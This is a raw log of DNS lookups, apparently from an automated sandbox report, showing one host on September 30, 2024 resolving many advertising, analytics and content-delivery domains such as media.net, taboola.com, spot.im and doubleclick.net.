                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.538130045 CEST192.168.2.41.1.1.10x98b5Standard query (0)api-2-0.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.538321972 CEST192.168.2.41.1.1.10x7452Standard query (0)api-2-0.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.538883924 CEST192.168.2.41.1.1.10xccb0Standard query (0)static-cdn.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.539017916 CEST192.168.2.41.1.1.10xb166Standard query (0)static-cdn.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.574745893 CEST192.168.2.41.1.1.10xac8bStandard query (0)publisher-assets.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.574873924 CEST192.168.2.41.1.1.10x839cStandard query (0)publisher-assets.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.153343916 CEST192.168.2.41.1.1.10x50daStandard query (0)publisher-assets.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.153691053 CEST192.168.2.41.1.1.10x11dcStandard query (0)publisher-assets.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.808918953 CEST192.168.2.41.1.1.10x4597Standard query (0)yahoo-bidout-d.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.809056997 CEST192.168.2.41.1.1.10x6faeStandard query (0)yahoo-bidout-d.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.809642076 CEST192.168.2.41.1.1.10x68bStandard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.809773922 CEST192.168.2.41.1.1.10x86c7Standard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.881431103 CEST192.168.2.41.1.1.10xb57fStandard query (0)navvy.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.881562948 CEST192.168.2.41.1.1.10xca6cStandard query (0)navvy.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.905154943 CEST192.168.2.41.1.1.10x9577Standard query (0)warp.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.905328989 CEST192.168.2.41.1.1.10xd546Standard query (0)warp.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.905697107 CEST192.168.2.41.1.1.10x170dStandard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.905920029 CEST192.168.2.41.1.1.10xd220Standard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.993462086 CEST192.168.2.41.1.1.10xce16Standard query (0)direct-events-collector.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.993884087 CEST192.168.2.41.1.1.10x39fStandard query (0)direct-events-collector.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.117080927 CEST192.168.2.41.1.1.10xb14dStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.117221117 CEST192.168.2.41.1.1.10xbf2Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.206523895 CEST192.168.2.41.1.1.10x7973Standard query (0)static-cdn.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.206674099 CEST192.168.2.41.1.1.10x9c52Standard query (0)static-cdn.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.433491945 CEST192.168.2.41.1.1.10xba24Standard query (0)api-2-0.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.433635950 CEST192.168.2.41.1.1.10x79a0Standard query (0)api-2-0.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.495934963 CEST192.168.2.41.1.1.10x1749Standard query (0)idpix.media6degrees.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.496083021 CEST192.168.2.41.1.1.10xf34Standard query (0)idpix.media6degrees.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.499949932 CEST192.168.2.41.1.1.10x72c7Standard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.500133991 CEST192.168.2.41.1.1.10xd77dStandard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.667256117 CEST192.168.2.41.1.1.10xd60dStandard query (0)sync.mathtag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.667408943 CEST192.168.2.41.1.1.10xe904Standard query (0)sync.mathtag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.754931927 CEST192.168.2.41.1.1.10x463bStandard query (0)us.creativecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.755067110 CEST192.168.2.41.1.1.10x2f48Standard query (0)us.creativecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.760130882 CEST192.168.2.41.1.1.10xe91eStandard query (0)rtb.adentifi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.760304928 CEST192.168.2.41.1.1.10xc907Standard query (0)rtb.adentifi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.824023962 CEST192.168.2.41.1.1.10x876dStandard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.824166059 CEST192.168.2.41.1.1.10x845eStandard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.955982924 CEST192.168.2.41.1.1.10x2d68Standard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.957308054 CEST192.168.2.41.1.1.10xd464Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.992818117 CEST192.168.2.41.1.1.10xf29bStandard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.993025064 CEST192.168.2.41.1.1.10x9ba5Standard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.026993036 CEST192.168.2.41.1.1.10xbd98Standard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.027131081 CEST192.168.2.41.1.1.10x556bStandard query (0)hbx.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.028019905 CEST192.168.2.41.1.1.10x22feStandard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.028162003 CEST192.168.2.41.1.1.10x4dd0Standard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.098028898 CEST192.168.2.41.1.1.10x789fStandard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.098184109 CEST192.168.2.41.1.1.10x66dcStandard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.101099014 CEST192.168.2.41.1.1.10x4d00Standard query (0)sync.go.sonobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.101283073 CEST192.168.2.41.1.1.10x1117Standard query (0)sync.go.sonobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.101608992 CEST192.168.2.41.1.1.10x876Standard query (0)medianet-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.101732016 CEST192.168.2.41.1.1.10xd81eStandard query (0)medianet-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.171052933 CEST192.168.2.41.1.1.10x2b70Standard query (0)rtb.mfadsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.171199083 CEST192.168.2.41.1.1.10x98aStandard query (0)rtb.mfadsrvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.445869923 CEST192.168.2.41.1.1.10xbda9Standard query (0)akl-navvy.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.446033955 CEST192.168.2.41.1.1.10x1eb1Standard query (0)akl-navvy.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.448740005 CEST192.168.2.41.1.1.10x5aaStandard query (0)bttrack.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.448883057 CEST192.168.2.41.1.1.10xcaabStandard query (0)bttrack.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.536657095 CEST192.168.2.41.1.1.10x66b7Standard query (0)warp.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.536787987 CEST192.168.2.41.1.1.10x513cStandard query (0)warp.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.624181986 CEST192.168.2.41.1.1.10x6e1dStandard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.624335051 CEST192.168.2.41.1.1.10xbb1cStandard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.706864119 CEST192.168.2.41.1.1.10x6dddStandard query (0)u.ipw.metadsp.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.707019091 CEST192.168.2.41.1.1.10xff35Standard query (0)u.ipw.metadsp.co.uk65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.844367027 CEST192.168.2.41.1.1.10x1f75Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.844520092 CEST192.168.2.41.1.1.10xb22aStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.885840893 CEST192.168.2.41.1.1.10xfd69Standard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.885996103 CEST192.168.2.41.1.1.10xfa3dStandard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.524511099 CEST192.168.2.41.1.1.10x73a6Standard query (0)s.seedtag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.524646044 CEST192.168.2.41.1.1.10x63ffStandard query (0)s.seedtag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.742156029 CEST192.168.2.41.1.1.10x6ffcStandard query (0)akl-navvy.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.742300987 CEST192.168.2.41.1.1.10xfde7Standard query (0)akl-navvy.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.743695974 CEST192.168.2.41.1.1.10x4a10Standard query (0)rtb.mfadsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.743910074 CEST192.168.2.41.1.1.10x8042Standard query (0)rtb.mfadsrvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.744350910 CEST192.168.2.41.1.1.10xd69Standard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.744477987 CEST192.168.2.41.1.1.10xb5baStandard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.748406887 CEST192.168.2.41.1.1.10x16dStandard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.748601913 CEST192.168.2.41.1.1.10xacf3Standard query (0)hbx.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.194247961 CEST192.168.2.41.1.1.10xc7b5Standard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.194386005 CEST192.168.2.41.1.1.10x50cStandard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.225872993 CEST192.168.2.41.1.1.10x106bStandard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.226008892 CEST192.168.2.41.1.1.10x1c99Standard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.426486015 CEST192.168.2.41.1.1.10xddf8Standard query (0)s2s.t13.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.426611900 CEST192.168.2.41.1.1.10xbd1aStandard query (0)s2s.t13.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.506495953 CEST192.168.2.41.1.1.10x7d06Standard query (0)visitor.omnitagjs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.506653070 CEST192.168.2.41.1.1.10xb16dStandard query (0)visitor.omnitagjs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.623816967 CEST192.168.2.41.1.1.10xdbb9Standard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.623944044 CEST192.168.2.41.1.1.10xcc76Standard query (0)sync.outbrain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.132064104 CEST192.168.2.41.1.1.10x8f5aStandard query (0)exchange.mediavine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.132379055 CEST192.168.2.41.1.1.10xabf0Standard query (0)exchange.mediavine.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.340316057 CEST192.168.2.41.1.1.10x89f2Standard query (0)s2s.t13.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.340473890 CEST192.168.2.41.1.1.10xb653Standard query (0)s2s.t13.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.401333094 CEST192.168.2.41.1.1.10x7af7Standard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.401510954 CEST192.168.2.41.1.1.10xaa92Standard query (0)sync.outbrain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.517215014 CEST192.168.2.41.1.1.10xbfa6Standard query (0)visitor.omnitagjs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.517942905 CEST192.168.2.41.1.1.10xd1c6Standard query (0)visitor.omnitagjs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.750351906 CEST192.168.2.41.1.1.10x2750Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.750526905 CEST192.168.2.41.1.1.10x6c37Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.271409035 CEST192.168.2.41.1.1.10x83feStandard query (0)exchange.mediavine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.271548986 CEST192.168.2.41.1.1.10x8a04Standard query (0)exchange.mediavine.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.679079056 CEST192.168.2.41.1.1.10xbcfdStandard query (0)pix.spot.imA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.679661036 CEST192.168.2.41.1.1.10x7835Standard query (0)pix.spot.im65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.844238043 CEST192.168.2.41.1.1.10xb14bStandard query (0)vidanalytics.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.844573021 CEST192.168.2.41.1.1.10xf0d7Standard query (0)vidanalytics.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:24.356656075 CEST192.168.2.41.1.1.10x90e4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:24.356820107 CEST192.168.2.41.1.1.10x6f4cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:37.511451006 CEST192.168.2.41.1.1.10x44fStandard query (0)sync.targeting.unrulymedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:37.511723995 CEST192.168.2.41.1.1.10x3942Standard query (0)sync.targeting.unrulymedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:38.590836048 CEST192.168.2.41.1.1.10xc30aStandard query (0)csm.nl3.eu.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:38.593786955 CEST192.168.2.41.1.1.10xc919Standard query (0)csm.nl3.eu.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:41.445352077 CEST192.168.2.41.1.1.10xae45Standard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:41.445664883 CEST192.168.2.41.1.1.10x60adStandard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.650890112 CEST192.168.2.41.1.1.10x8f64Standard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.651607037 CEST192.168.2.41.1.1.10xe6e0Standard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.653919935 CEST192.168.2.41.1.1.10xcabStandard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.654112101 CEST192.168.2.41.1.1.10xe433Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.666520119 CEST192.168.2.41.1.1.10xa7e4Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.666924000 CEST192.168.2.41.1.1.10x945Standard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.680476904 CEST192.168.2.41.1.1.10x2181Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.680936098 CEST192.168.2.41.1.1.10x9a5aStandard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.684282064 CEST192.168.2.41.1.1.10xf26eStandard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.684458017 CEST192.168.2.41.1.1.10x7262Standard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.686465979 CEST192.168.2.41.1.1.10x47caStandard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.686827898 CEST192.168.2.41.1.1.10x44fdStandard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.690845013 CEST192.168.2.41.1.1.10x5da5Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.691018105 CEST192.168.2.41.1.1.10x4feStandard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.520601988 CEST192.168.2.41.1.1.10xc4f7Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.520751953 CEST192.168.2.41.1.1.10xdeeStandard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.705373049 CEST192.168.2.41.1.1.10x4413Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.705759048 CEST192.168.2.41.1.1.10xb2deStandard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.820801973 CEST192.168.2.41.1.1.10x4b6Standard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.820976973 CEST192.168.2.41.1.1.10xbb59Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.158999920 CEST192.168.2.41.1.1.10x90b7Standard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.159199953 CEST192.168.2.41.1.1.10xd6c1Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.168204069 CEST192.168.2.41.1.1.10x28f8Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.168359995 CEST192.168.2.41.1.1.10xb8bcStandard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.713968992 CEST192.168.2.41.1.1.10x7466Standard query (0)onetag-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.714231014 CEST192.168.2.41.1.1.10xcde6Standard query (0)onetag-sys.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.719284058 CEST192.168.2.41.1.1.10xff65Standard query (0)trace.mediago.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.719508886 CEST192.168.2.41.1.1.10xe22dStandard query (0)trace.mediago.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.836941004 CEST192.168.2.41.1.1.10x93a0Standard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.836941004 CEST192.168.2.41.1.1.10x5460Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.040436983 CEST192.168.2.41.1.1.10x2406Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.040436983 CEST192.168.2.41.1.1.10x8fafStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.247962952 CEST192.168.2.41.1.1.10xe207Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.248198032 CEST192.168.2.41.1.1.10x5c44Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.494684935 CEST192.168.2.41.1.1.10x47baStandard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.497751951 CEST192.168.2.41.1.1.10x5d6eStandard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.007090092 CEST192.168.2.41.1.1.10x5464Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.007549047 CEST192.168.2.41.1.1.10x2f2bStandard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.106281996 CEST192.168.2.41.1.1.10xb1e2Standard query (0)contextual.media.netA (IP address)IN (0x0001)false
